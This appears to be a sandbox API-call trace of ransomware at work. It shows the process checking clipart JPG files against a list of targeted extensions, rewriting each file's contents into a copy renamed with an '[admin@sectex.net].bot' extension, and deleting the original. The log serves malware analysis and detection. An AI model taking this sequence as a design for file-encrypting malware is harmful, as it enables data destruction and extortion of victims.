	[0170.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.641] lstrlenW (lpString=".jpg") returned 4
	[0170.641] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.642] lstrlenW (lpString=".doc") returned 4
	[0170.642] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.642] lstrlenW (lpString=".docx") returned 5
	[0170.642] lstrcmpiW (lpString1=".docx", lpString2="6.JPG") returned -1
	[0170.642] lstrlenW (lpString=".pdf") returned 4
	[0170.642] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.642] lstrlenW (lpString=".xls") returned 4
	[0170.642] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.642] lstrlenW (lpString=".xlsx") returned 5
	[0170.642] lstrcmpiW (lpString1=".xlsx", lpString2="6.JPG") returned -1
	[0170.642] lstrlenW (lpString=".ppt") returned 4
	[0170.642] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.642] lstrlenW (lpString=".zip") returned 4
	[0170.642] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.642] lstrlenW (lpString=".rar") returned 4
	[0170.642] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.642] lstrlenW (lpString=".bz2") returned 4
	[0170.642] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.642] lstrlenW (lpString=".7z") returned 3
	[0170.642] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.642] lstrlenW (lpString=".dbf") returned 4
	[0170.642] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.642] lstrlenW (lpString=".1cd") returned 4
	[0170.642] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 63
	[0170.642] lstrlenW (lpString=".jpg") returned 4
	[0170.642] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.643] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.643] lstrlenW (lpString="J0178523.JPG") returned 12
	[0170.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.643] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=24034) returned 1
	[0170.643] CloseHandle (hObject=0x350) returned 1
	[0170.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg")) returned 0x20
	[0170.643] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.644] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.644] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.644] GetLastError () returned 0x0
	[0170.644] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5de2, lpOverlapped=0x0) returned 1
	[0170.648] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5df0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5df0, lpOverlapped=0x0) returned 1
	[0170.649] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.649] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.649] SetEndOfFile (hFile=0x180) returned 1
	[0170.649] CloseHandle (hObject=0x180) returned 1
	[0170.649] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.649] SetEndOfFile (hFile=0x350) returned 1
	[0170.652] CloseHandle (hObject=0x350) returned 1
	[0170.652] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.652] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178523.jpg")) returned 1
	[0170.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.653] lstrlenW (lpString=".doc") returned 4
	[0170.653] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.653] lstrlenW (lpString=".docx") returned 5
	[0170.653] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0170.653] lstrlenW (lpString=".pdf") returned 4
	[0170.653] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.653] lstrlenW (lpString=".xls") returned 4
	[0170.653] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.653] lstrlenW (lpString=".xlsx") returned 5
	[0170.653] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0170.653] lstrlenW (lpString=".ppt") returned 4
	[0170.653] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.653] lstrlenW (lpString=".zip") returned 4
	[0170.653] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.653] lstrlenW (lpString=".rar") returned 4
	[0170.653] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.653] lstrlenW (lpString=".bz2") returned 4
	[0170.653] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.653] lstrlenW (lpString=".7z") returned 3
	[0170.653] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.653] lstrlenW (lpString=".dbf") returned 4
	[0170.653] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.653] lstrlenW (lpString=".1cd") returned 4
	[0170.653] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.653] lstrlenW (lpString=".jpg") returned 4
	[0170.653] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.654] lstrlenW (lpString=".doc") returned 4
	[0170.654] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.654] lstrlenW (lpString=".docx") returned 5
	[0170.654] lstrcmpiW (lpString1=".docx", lpString2="3.JPG") returned -1
	[0170.654] lstrlenW (lpString=".pdf") returned 4
	[0170.654] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.654] lstrlenW (lpString=".xls") returned 4
	[0170.654] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.654] lstrlenW (lpString=".xlsx") returned 5
	[0170.654] lstrcmpiW (lpString1=".xlsx", lpString2="3.JPG") returned -1
	[0170.654] lstrlenW (lpString=".ppt") returned 4
	[0170.654] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.654] lstrlenW (lpString=".zip") returned 4
	[0170.654] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.654] lstrlenW (lpString=".rar") returned 4
	[0170.654] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.654] lstrlenW (lpString=".bz2") returned 4
	[0170.654] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.654] lstrlenW (lpString=".7z") returned 3
	[0170.654] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.654] lstrlenW (lpString=".dbf") returned 4
	[0170.654] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.654] lstrlenW (lpString=".1cd") returned 4
	[0170.654] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 63
	[0170.654] lstrlenW (lpString=".jpg") returned 4
	[0170.654] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.655] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.655] lstrlenW (lpString="J0178632.JPG") returned 12
	[0170.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.655] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=23338) returned 1
	[0170.655] CloseHandle (hObject=0x350) returned 1
	[0170.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg")) returned 0x20
	[0170.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0170.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0170.656] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.656] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0170.657] GetLastError () returned 0x0
	[0170.657] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x5b2a, lpOverlapped=0x0) returned 1
	[0170.659] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x5b30, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x5b30, lpOverlapped=0x0) returned 1
	[0170.660] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0170.660] WriteFile (in: hFile=0x180, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0170.660] SetEndOfFile (hFile=0x180) returned 1
	[0170.660] CloseHandle (hObject=0x180) returned 1
	[0170.660] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0170.660] SetEndOfFile (hFile=0x350) returned 1
	[0170.663] CloseHandle (hObject=0x350) returned 1
	[0170.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0170.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178632.jpg")) returned 1
	[0170.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.987] lstrlenW (lpString=".doc") returned 4
	[0170.987] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.987] lstrlenW (lpString=".docx") returned 5
	[0170.987] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0170.987] lstrlenW (lpString=".pdf") returned 4
	[0170.987] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.987] lstrlenW (lpString=".xls") returned 4
	[0170.987] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.987] lstrlenW (lpString=".xlsx") returned 5
	[0170.987] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0170.987] lstrlenW (lpString=".ppt") returned 4
	[0170.987] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.987] lstrlenW (lpString=".zip") returned 4
	[0170.987] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.987] lstrlenW (lpString=".rar") returned 4
	[0170.987] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.987] lstrlenW (lpString=".bz2") returned 4
	[0170.987] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.987] lstrlenW (lpString=".7z") returned 3
	[0170.987] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.987] lstrlenW (lpString=".dbf") returned 4
	[0170.988] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.988] lstrlenW (lpString=".1cd") returned 4
	[0170.988] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.988] lstrlenW (lpString=".jpg") returned 4
	[0170.988] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.988] lstrlenW (lpString=".doc") returned 4
	[0170.988] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0170.988] lstrlenW (lpString=".docx") returned 5
	[0170.988] lstrcmpiW (lpString1=".docx", lpString2="2.JPG") returned -1
	[0170.988] lstrlenW (lpString=".pdf") returned 4
	[0170.988] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0170.988] lstrlenW (lpString=".xls") returned 4
	[0170.988] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0170.988] lstrlenW (lpString=".xlsx") returned 5
	[0170.988] lstrcmpiW (lpString1=".xlsx", lpString2="2.JPG") returned -1
	[0170.988] lstrlenW (lpString=".ppt") returned 4
	[0170.988] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.988] lstrlenW (lpString=".zip") returned 4
	[0170.988] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0170.988] lstrlenW (lpString=".rar") returned 4
	[0170.988] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0170.988] lstrlenW (lpString=".bz2") returned 4
	[0170.988] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0170.988] lstrlenW (lpString=".7z") returned 3
	[0170.988] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.988] lstrlenW (lpString=".dbf") returned 4
	[0170.988] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0170.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.989] lstrlenW (lpString=".1cd") returned 4
	[0170.989] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0170.989] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 63
	[0170.989] lstrlenW (lpString=".jpg") returned 4
	[0170.989] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0170.989] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0170.989] lstrlenW (lpString="J0178639.JPG") returned 12
	[0170.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c
	[0170.996] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=32038) returned 1
	[0170.996] CloseHandle (hObject=0x17c) returned 1
	[0170.996] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg")) returned 0x20
	[0171.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.060] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.060] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.061] GetLastError () returned 0x0
	[0171.061] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x7d26, lpOverlapped=0x0) returned 1
	[0171.087] WriteFile (in: hFile=0x188, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x7d30, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x7d30, lpOverlapped=0x0) returned 1
	[0171.089] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.089] WriteFile (in: hFile=0x188, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.089] SetEndOfFile (hFile=0x188) returned 1
	[0171.089] CloseHandle (hObject=0x188) returned 1
	[0171.089] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.089] SetEndOfFile (hFile=0x350) returned 1
	[0171.091] CloseHandle (hObject=0x350) returned 1
	[0171.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.092] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178639.jpg")) returned 1
	[0171.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.092] lstrlenW (lpString=".doc") returned 4
	[0171.092] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0171.092] lstrlenW (lpString=".docx") returned 5
	[0171.092] lstrcmpiW (lpString1=".docx", lpString2="9.JPG") returned -1
	[0171.092] lstrlenW (lpString=".pdf") returned 4
	[0171.093] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0171.093] lstrlenW (lpString=".xls") returned 4
	[0171.093] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0171.093] lstrlenW (lpString=".xlsx") returned 5
	[0171.093] lstrcmpiW (lpString1=".xlsx", lpString2="9.JPG") returned -1
	[0171.093] lstrlenW (lpString=".ppt") returned 4
	[0171.093] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0171.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.093] lstrlenW (lpString=".zip") returned 4
	[0171.093] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0171.093] lstrlenW (lpString=".rar") returned 4
	[0171.093] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0171.093] lstrlenW (lpString=".bz2") returned 4
	[0171.093] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0171.093] lstrlenW (lpString=".7z") returned 3
	[0171.093] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0171.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.093] lstrlenW (lpString=".dbf") returned 4
	[0171.093] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0171.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.093] lstrlenW (lpString=".1cd") returned 4
	[0171.093] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0171.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.093] lstrlenW (lpString=".jpg") returned 4
	[0171.093] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0171.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 63
	[0171.093] lstrlenW (lpString=".doc") returned 4
	[0171.093] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
